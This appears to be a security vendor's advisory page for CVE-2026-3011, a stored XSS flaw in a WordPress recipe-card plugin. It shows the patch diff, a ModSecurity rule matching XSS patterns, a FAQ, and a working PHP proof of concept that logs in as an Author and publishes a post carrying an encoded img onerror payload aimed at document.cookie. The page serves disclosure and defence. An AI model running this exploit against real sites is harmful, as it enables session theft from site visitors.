-			WPZOOM_Recipe_Card_Block::$attributes['directionsTitle']  = isset( $directionsTitle ) ? WPZOOM_Helpers::deserialize_block_attributes( $directionsTitle ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_steps_title' );
-			WPZOOM_Recipe_Card_Block::$attributes['videoTitle']       = isset( $videoTitle ) ? WPZOOM_Helpers::deserialize_block_attributes( $videoTitle ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_video_title' );
+			WPZOOM_Recipe_Card_Block::$attributes['ingredientsTitle'] = isset( $ingredientsTitle ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $ingredientsTitle ) ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_ingredients_title' );
+			WPZOOM_Recipe_Card_Block::$attributes['directionsTitle']  = isset( $directionsTitle ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $directionsTitle ) ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_steps_title' );
+			WPZOOM_Recipe_Card_Block::$attributes['videoTitle']       = isset( $videoTitle ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $videoTitle ) ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_video_title' );

 			$class .= $hasImage && isset( $image['url'] ) ? '' : ' recipe-card-noimage';
 			$class .= $settings['hide_header_image'] ? ' recipe-card-noimage' : '';
@@ -119,7 +119,7 @@

 			$custom_author_name = $recipe_author_name;
 			if ( ! empty( $settings['custom_author_name'] ) ) {
-				$custom_author_name = WPZOOM_Helpers::deserialize_block_attributes( $settings['custom_author_name'] );
+				$custom_author_name = wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $settings['custom_author_name'] ) );
 			}

 			$RecipeCardClassName = implode( ' ', array( $class, $className ) );
@@ -221,7 +221,7 @@
 					$summary_text  = sprintf(
 						'<p class="%s">%s</p>',
 						esc_attr( $summary_class ),
-						WPZOOM_Helpers::deserialize_block_attributes( $summary )
+						wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $summary ) )
 					);
 				}
 			}
@@ -231,9 +231,9 @@
 			$steps_content       = WPZOOM_Recipe_Card_Block::get_steps_content( $steps );

 			$strip_tags_notes = isset( $notes ) ? strip_tags( $notes ) : '';
-			$notes            = isset( $notes ) ? WPZOOM_Helpers::deserialize_block_attributes( $notes ) : '';
+			$notes            = isset( $notes ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $notes ) ) : '';
 			$notes            = isset( $notes ) ? str_replace( '<li></li>', '', $notes ) : ''; // remove empty list item
-			$notesTitle       = isset( $notesTitle ) ? WPZOOM_Helpers::deserialize_block_attributes( $notesTitle ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_notes_title' );
+			$notesTitle       = isset( $notesTitle ) ? wp_kses_post( WPZOOM_Helpers::deserialize_block_attributes( $notesTitle ) ) : WPZOOM_Settings::get( 'wpzoom_rcb_settings_notes_title' );
 			$notes_content    = ! empty( $strip_tags_notes ) ?
 				sprintf(
 					'<div class="recipe-card-notes">
--- a/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-recipes-page-notice.php
+++ b/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-recipes-page-notice.php
@@ -0,0 +1,231 @@
+<?php
+/**
+ * Display an upgrade notice on the Recipes admin page for free version users.
+ *
+ * @since   3.4.14
+ * @package WPZOOM_Recipe_Card_Blocks
+ */
+
+if ( ! class_exists( 'WPZOOM_Recipes_Page_Notice' ) ) {
+	class WPZOOM_Recipes_Page_Notice {
+
+		const UPGRADE_LINK = 'https://recipecard.io/pricing/?utm_source=wpadmin&utm_medium=recipes-page-notice&utm_campaign=rcb-upsell';
+		const DISMISS_META_KEY = 'wpzoom_rcb_dismiss_recipes_page_notice';
+		const MIN_RECIPES = 10;
+
+		/**
+		 * Initialize the notice hooks.
+		 */
+		public static function init() {
+			// Only show for free version users.
+			if ( defined( 'WPZOOM_RCB_HAS_PRO' ) && WPZOOM_RCB_HAS_PRO ) {
+				return;
+			}
+
+			global $pagenow;
+
+			$is_recipes_page = $pagenow === 'edit.php' && isset( $_GET['post_type'] ) && $_GET['post_type'] === 'wpzoom_rcb';
+			$is_settings_page = $pagenow === 'admin.php' && isset( $_GET['page'] ) && $_GET['page'] === 'wpzoom-recipe-card-settings';
+
+			if ( is_admin() && ( $is_recipes_page || $is_settings_page ) ) {
+				add_action( 'admin_notices', array( __CLASS__, 'maybe_show_notice' ) );
+			}
+
+			add_action( 'wp_ajax_rcb_dismiss_recipes_page_notice', array( __CLASS__, 'dismiss_notice' ) );
+		}
+
+		/**
+		 * Show the notice if not dismissed and user has enough recipes.
+		 */
+		public static function maybe_show_notice() {
+			if ( get_user_meta( get_current_user_id(), self::DISMISS_META_KEY, true ) ) {
+				return;
+			}
+
+			$recipe_count = wp_count_posts( 'wpzoom_rcb' );
+			$total        = isset( $recipe_count->publish ) ? (int) $recipe_count->publish : 0;
+			$total       += isset( $recipe_count->draft ) ? (int) $recipe_count->draft : 0;
+
+			if ( $total < self::MIN_RECIPES ) {
+				return;
+			}
+
+			self::render_notice( $total );
+		}
+
+		/**
+		 * Handle the AJAX dismiss request.
+		 */
+		public static function dismiss_notice() {
+			update_user_meta( get_current_user_id(), self::DISMISS_META_KEY, true );
+			wp_send_json_success();
+		}
+
+		/**
+		 * Render the upgrade notice.
+		 *
+		 * @param int $recipe_count Number of recipes.
+		 */
+		private static function render_notice( $recipe_count ) {
+			$upgrade_url = self::UPGRADE_LINK;
+			?>
+			<div id="wpzoom-rcb-recipes-page-notice" class="wpzoom-rcb-upgrade-notice notice notice-warning is-dismissible">
+				<div class="wpzoom-rcb-upgrade-notice-inner">
+					<div class="wpzoom-rcb-upgrade-notice-icon">
+						<span class="dashicons dashicons-warning"></span>
+					</div>
+					<div class="wpzoom-rcb-upgrade-notice-content">
+						<h3><?php esc_html_e( 'Action Required: Your recipes are missing key SEO features', 'recipe-card-blocks-by-wpzoom' ); ?></h3>
+						<p>
+							<?php
+							printf(
+								/* translators: %d: number of recipes */
+								esc_html__( 'You have %d recipes but you're using the free version of Recipe Card Blocks, which doesn't include Star Ratings in Google search results. Without ratings, your recipes are less likely to stand out and get clicks. Upgrade to PRO to unlock:', 'recipe-card-blocks-by-wpzoom' ),
+								$recipe_count
+							);
+							?>
+						</p>
+						<ul>
+							<li><strong><?php esc_html_e( 'Star Ratings in Google', 'recipe-card-blocks-by-wpzoom' ); ?></strong> — <?php esc_html_e( 'show star ratings directly in search results to boost click-through rates', 'recipe-card-blocks-by-wpzoom' ); ?></li>
+							<li><strong><?php esc_html_e( 'Recipe Index', 'recipe-card-blocks-by-wpzoom' ); ?></strong> — <?php esc_html_e( 'a searchable recipe catalog that keeps visitors on your site longer', 'recipe-card-blocks-by-wpzoom' ); ?></li>
+							<li><strong><?php esc_html_e( 'Adjustable Servings & Unit Conversion', 'recipe-card-blocks-by-wpzoom' ); ?></strong> — <?php esc_html_e( 'let readers scale ingredients and switch between US/Metric', 'recipe-card-blocks-by-wpzoom' ); ?></li>
+						</ul>
+					</div>
+					<div class="wpzoom-rcb-upgrade-notice-cta">
+						<a href="<?php echo esc_url( $upgrade_url ); ?>" target="_blank" class="button button-primary wpzoom-rcb-upgrade-btn"><?php esc_html_e( 'Upgrade to PRO', 'recipe-card-blocks-by-wpzoom' ); ?> →</a>
+						<a href="<?php echo esc_url( admin_url( 'admin.php?page=wpzoom-recipe-card-vs-pro' ) ); ?>" class="wpzoom-rcb-compare-link"><?php esc_html_e( 'See all PRO features', 'recipe-card-blocks-by-wpzoom' ); ?></a>
+					</div>
+				</div>
+			</div>
+			<style>
+				#wpzoom-rcb-recipes-page-notice {
+					border-left-color: #dba617;
+					padding: 0;
+				}
+
+				#wpzoom-rcb-recipes-page-notice.notice-warning {
+					border-left-width: 4px;
+				}
+
+				.wpzoom-rcb-upgrade-notice-inner {
+					display: flex;
+					align-items: flex-start;
+					padding: 16px 12px;
+					gap: 16px;
+				}
+
+				.wpzoom-rcb-upgrade-notice-icon {
+					flex-shrink: 0;
+				}
+
+				.wpzoom-rcb-upgrade-notice-icon .dashicons {
+					font-size: 36px;
+					width: 36px;
+					height: 36px;
+					color: #dba617;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content {
+					flex: 1;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content h3 {
+					margin: 0 0 6px;
+					font-size: 14px;
+					color: #1d2327;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content p {
+					margin: 0 0 10px;
+					font-size: 13px;
+					color: #50575e;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content ul {
+					margin: 0;
+					padding: 0;
+					list-style: none;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content ul li {
+					font-size: 13px;
+					color: #50575e;
+					padding: 2px 0;
+				}
+
+				.wpzoom-rcb-upgrade-notice-content ul li::before {
+					content: "2713";
+					color: #dba617;
+					font-weight: bold;
+					margin-right: 6px;
+				}
+
+				.wpzoom-rcb-upgrade-notice-cta {
+					flex-shrink: 0;
+					display: flex;
+					flex-direction: column;
+					align-items: center;
+					gap: 8px;
+					padding-top: 4px;
+                    margin-top: 20px;
+				}
+
+				.wpzoom-rcb-upgrade-btn.button.button-primary {
+					background: #E1581A;
+					border-color: #c94e16;
+					font-size: 14px;
+					padding: 6px 20px;
+					height: auto;
+					line-height: 1.6;
+					white-space: nowrap;
+				}
+
+				.wpzoom-rcb-upgrade-btn.button.button-primary:hover {
+					background: #c94e16;
+					border-color: #b0430f;
+				}
+
+				.wpzoom-rcb-compare-link {
+					font-size: 12px;
+					color: #50575e;
+					text-decoration: none;
+				}
+
+				.wpzoom-rcb-compare-link:hover {
+					color: #E1581A;
+				}
+
+				@media screen and (max-width: 782px) {
+					.wpzoom-rcb-upgrade-notice-inner {
+						flex-direction: column;
+					}
+
+					.wpzoom-rcb-upgrade-notice-icon {
+						display: none;
+					}
+
+					.wpzoom-rcb-upgrade-notice-cta {
+						flex-direction: row;
+						align-items: center;
+					}
+				}
+			</style>
+			<script type="text/javascript">
+				jQuery(document).ready(function($) {
+					$(document).on('click', '#wpzoom-rcb-recipes-page-notice .notice-dismiss', function() {
+						$.ajax({
+							url: ajaxurl,
+							type: 'GET',
+							data: {
+								action: 'rcb_dismiss_recipes_page_notice'
+							}
+						});
+					});
+				});
+			</script>
+			<?php
+		}
+	}
+}
+
+WPZOOM_Recipes_Page_Notice::init();
--- a/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-settings.php
+++ b/recipe-card-blocks-by-wpzoom/src/classes/class-wpzoom-settings.php
@@ -941,6 +941,66 @@
                         ),
                     ),

+					array(
+						'id'       => 'wpzoom_section_adjustable_servings',
+						'title'    => __( 'Adjustable Servings', 'recipe-card-blocks-by-wpzoom' ),
+						'page'     => 'wpzoom-recipe-card-settings-general',
+						'callback' => '__return_false',
+						'fields'   => array(
+							array(
+								'id'    => 'wpzoom_rcb_settings_enable_adjustable_servings',
+								'title' => __( 'Enable Adjustable Servings', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'checkbox',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_enable_adjustable_servings',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Let readers scale ingredient quantities to any serving size.', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => false,
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+								),
+							),
+							array(
+								'id'    => 'wpzoom_rcb_settings_adjustable_servings_style',
+								'title' => __( 'Control Style', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'select',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_adjustable_servings_style',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Choose how readers adjust the serving size.', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => 'plus_minus',
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+									'options'     => array(
+										'plus_minus' => __( 'Plus/Minus Buttons', 'recipe-card-blocks-by-wpzoom' ),
+										'toggles'    => __( 'Slider Toggles', 'recipe-card-blocks-by-wpzoom' ),
+									),
+								),
+							),
+						),
+					),
+
+					array(
+						'id'       => 'wpzoom_section_food_labels',
+						'title'    => __( 'Food Labels', 'recipe-card-blocks-by-wpzoom' ),
+						'page'     => 'wpzoom-recipe-card-settings-general',
+						'callback' => '__return_false',
+						'fields'   => array(
+							array(
+								'id'    => 'wpzoom_rcb_settings_display_food_labels',
+								'title' => __( 'Display Food Labels', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'checkbox',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_display_food_labels',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Show allergen and dietary info badges on recipes (Gluten-Free, Vegan, Nut-Free, etc.).', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => false,
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+								),
+							),
+						),
+					),

 					array(
 						'id'       => 'wpzoom_section_recipe_miscellaneous',
@@ -1055,6 +1115,63 @@
                     ),

 					array(
+						'id'       => 'wpzoom_section_global_colors',
+						'title'    => __( 'Global Colors', 'recipe-card-blocks-by-wpzoom' ),
+						'page'     => 'wpzoom-recipe-card-settings-appearance',
+						'callback' => '__return_false',
+						'fields'   => array(
+							array(
+								'id'    => 'wpzoom_rcb_settings_global_header_bg_color',
+								'title' => __( 'Header Background', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'colorpicker',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_global_header_bg_color',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Customize the recipe card header background color.', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => '#222222',
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+								),
+							),
+							array(
+								'id'    => 'wpzoom_rcb_settings_global_accent_color',
+								'title' => __( 'Accent Color', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'colorpicker',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_global_accent_color',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Set a global accent color for buttons and links in recipe cards.', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => '#E1581A',
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+								),
+							),
+						),
+					),
+
+					array(
+						'id'       => 'wpzoom_section_directions_gallery',
+						'title'    => __( 'Directions Image Gallery', 'recipe-card-blocks-by-wpzoom' ),
+						'page'     => 'wpzoom-recipe-card-settings-appearance',
+						'callback' => '__return_false',
+						'fields'   => array(
+							array(
+								'id'    => 'wpzoom_rcb_settings_enable_directions_gallery',
+								'title' => __( 'Enable Step-by-Step Gallery', 'recipe-card-blocks-by-wpzoom' ),
+								'type'  => 'checkbox',
+								'args'  => array(
+									'label_for'   => 'wpzoom_rcb_settings_enable_directions_gallery',
+									'class'       => 'wpzoom-rcb-field',
+									'description' => esc_html__( 'Add an image gallery with lightbox to each direction step.', 'recipe-card-blocks-by-wpzoom' ),
+									'default'     => false,
+									'disabled'    => true,
+									'badge'       => $premium_badge,
+								),
+							),
+						),
+					),
+
+					array(
 						'id'       => 'wpzoom_section_recipe_nutrition',
 						'title'    => __( 'Nutrition', 'recipe-card-blocks-by-wpzoom' ),
 						'page'     => 'wpzoom-recipe-card-settings-appearance',
@@ -1207,6 +1324,33 @@
                                     'default'     => true,
                                 ),
                             ),
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_print_show_preview',
+                                'title' => __( 'Print Preview', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'checkbox',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_print_show_preview',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Show a print preview dialog before printing, with text size controls.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => false,
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_print_credit_text',
+                                'title' => __( 'Custom Credit Text', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'input',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_print_credit_text',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Add your blog name and URL to printed recipes.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => '',
+                                    'type'        => 'text',
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
                         ),
                     ),
                     array(
@@ -1345,6 +1489,28 @@
                             ),
                         ),
                     ),
+
+                    array(
+                        'id'       => 'wpzoom_section_woocommerce',
+                        'title'    => __( 'WooCommerce Shoppable Recipes', 'recipe-card-blocks-by-wpzoom' ),
+                        'page'     => 'wpzoom-recipe-card-settings-miscellaneous',
+                        'callback' => '__return_false',
+                        'fields'   => array(
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_enable_shoppable_recipes',
+                                'title' => __( 'Enable Shoppable Recipes', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'checkbox',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_enable_shoppable_recipes',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Turn recipe ingredients into clickable purchase options via your WooCommerce store.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => false,
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
+                        ),
+                    ),
                 ),
             ),

@@ -1423,6 +1589,55 @@
                             ),
                         ),
                     ),
+                    array(
+                        'id'       => 'wpzoom_section_rating_modal',
+                        'title'    => __( 'Rating Modal', 'recipe-card-blocks-by-wpzoom' ),
+                        'page'     => 'wpzoom-recipe-card-settings-ratings',
+                        'callback' => '__return_false',
+                        'fields'   => array(
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_rating_modal_title',
+                                'title' => __( 'Modal Title', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'input',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_rating_modal_title',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Customize the title shown in the rating pop-up.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => __( 'Rate this Recipe', 'recipe-card-blocks-by-wpzoom' ),
+                                    'type'        => 'text',
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_rating_modal_button_color',
+                                'title' => __( 'Submit Button Color', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'colorpicker',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_rating_modal_button_color',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Color of the submit button in the rating modal.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => '#E1581A',
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
+                            array(
+                                'id'    => 'wpzoom_rcb_settings_rating_modal_thank_you',
+                                'title' => __( 'Thank You Message', 'recipe-card-blocks-by-wpzoom' ),
+                                'type'  => 'input',
+                                'args'  => array(
+                                    'label_for'   => 'wpzoom_rcb_settings_rating_modal_thank_you',
+                                    'class'       => 'wpzoom-rcb-field',
+                                    'description' => esc_html__( 'Message shown after a reader submits their rating.', 'recipe-card-blocks-by-wpzoom' ),
+                                    'default'     => __( 'Thank you for your rating!', 'recipe-card-blocks-by-wpzoom' ),
+                                    'type'        => 'text',
+                                    'disabled'    => true,
+                                    'badge'       => $premium_badge,
+                                ),
+                            ),
+                        ),
+                    ),
                 ),
             ),

@@ -1928,15 +2143,66 @@

                     <div class="license-wrap">
                         <h2 class="headline"><?php _e( 'Follow us!', 'recipe-card-blocks-by-wpzoom' ); ?></h2>
-                        <iframe src="https://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Frecipeblock&width=89&layout=button_count&action=like&size=large&show_faces=false&share=false&height=21&appId=610643215638351" width="129" height="30" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
-
-

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3011
# Block stored XSS via unicode-encoded payloads in recipe card summary/notes
SecRule REQUEST_URI "@streq /wp-admin/post.php" "id:20263011,phase:2,deny,status:403,chain,msg:'CVE-2026-3011 - Recipe Card Blocks XSS via summary/notes',severity:'CRITICAL',tag:'CVE-2026-3011'"
SecRule ARGS_POST:action "@streq editpost" "chain"
SecRule ARGS_POST:post_content "@rx \x[0-9a-fA-F]{2}" "t:urlDecode,t:lowercase,chain"
SecRule MATCHED_VAR "@rx <img[\s]+src|onerror|onmouseover|onload" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3011 - Recipe Card Blocks Lite <= 3.4.13 - Authenticated (Author+) Stored XSS via 'summary' and 'notes'

// Configuration: Set these variables
$target_url = 'http://example.com'; // WordPress site URL
$username = 'author'; // WordPress username with Author role
$password = 'password'; // User password

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}
echo "[+] Logged in successfully.n";

// Step 2: Create a new post with the malicious recipe block
// The XSS payload is unicode-encoded to bypass sanitization
$payload = '\x3Cimg src=x onerror=alert(document.cookie)\x3E';

// The post content must include a recipe block with the malicious summary or notes
$post_data = array(
    'post_title' => 'Atomic Edge CVE-2026-3011 Test',
    'post_content' => '<!-- wp:wpzoom/recipe-card {"id":1,"summary":"' . $payload . '","notes":"","title":"Test Recipe"} /-->',
    'post_status' => 'publish',
    'post_author' => '',
    'content' => '<!-- wp:wpzoom/recipe-card {"id":1,"summary":"' . $payload . '","notes":"","title":"Test Recipe"} /-->'
);

$post_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

// Extract _wpnonce for post creation
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die('Failed to extract nonce.');
}
echo "[+] Extracted nonce: $noncen";

$post_data['_wpnonce'] = $nonce;
$post_data['_wp_http_referer'] = '/wp-admin/post-new.php';
$post_data['action'] = 'editpost';
$post_data['originalaction'] = 'editpost';
$post_data['post_type'] = 'post';
$post_data['save'] = 'Publish';

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'post updated') !== false || strpos($response, 'message=6') !== false) {
    echo "[+] Post created successfully with malicious recipe block.n";
    echo "[+] XSS payload: $payloadn";
    echo "[+] Visit the new post to trigger the XSS.n";
} else {
    echo "[-] Post creation may have failed. Check manually.n";
}

?>

Frequently Asked Questions

What is CVE-2026-3011?
Overview of the vulnerability
CVE-2026-3011 is a stored cross-site scripting (XSS) vulnerability in the Recipe Card Blocks Lite plugin for WordPress. It allows authenticated users with Author-level permissions or higher to inject arbitrary web scripts via the ‘summary’ and ‘notes’ attributes of a recipe block.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the ‘WPZOOM_Helpers::deserialize_block_attributes’ method, which improperly decodes unicode-encoded sequences after initial sanitization. This allows attackers to inject malicious scripts that execute when users view the affected posts.
Who is affected by this vulnerability?
Identifying affected users
All users of the Recipe Card Blocks Lite plugin versions up to and including 3.4.13 are affected. Specifically, authenticated users with Author-level access can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Recipe Card Blocks Lite plugin installed. If it is version 3.4.13 or earlier, your site is at risk.
How can I fix or mitigate this vulnerability?
Updating the plugin
The recommended fix is to update the Recipe Card Blocks Lite plugin to version 3.4.14 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.
What does a CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation could lead to unauthorized script execution, impacting user security.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
If exploited, this vulnerability can lead to arbitrary JavaScript execution in the browsers of users viewing the affected posts. This may result in cookie theft, session hijacking, or redirection to malicious sites.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept illustrates how an authenticated user can log into a WordPress site and inject a malicious payload into the ‘summary’ or ‘notes’ fields. This payload, once stored, executes when the post is accessed by other users.
What is the role of sanitization in this vulnerability?
Importance of proper data handling
Sanitization is intended to prevent harmful scripts from being executed. However, in this case, the sanitization is undone by the plugin’s method that decodes unicode sequences, highlighting the need for robust security practices.
What should I do if I cannot update the plugin immediately?
Interim security measures
If immediate updating is not possible, consider disabling the Recipe Card Blocks Lite plugin until a secure version can be installed. Review user roles and limit Author-level access to trusted users only.
Are there any known workarounds for this vulnerability?
Alternative solutions
Currently, the most effective workaround is to update the plugin. There are no known temporary fixes that can fully mitigate the risk without applying the patch.
What should I do if I suspect my site has been compromised?
Steps for remediation
If you suspect exploitation, immediately change passwords for all accounts, especially those with Author-level access. Review recent posts for unauthorized changes and consider restoring from a backup.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations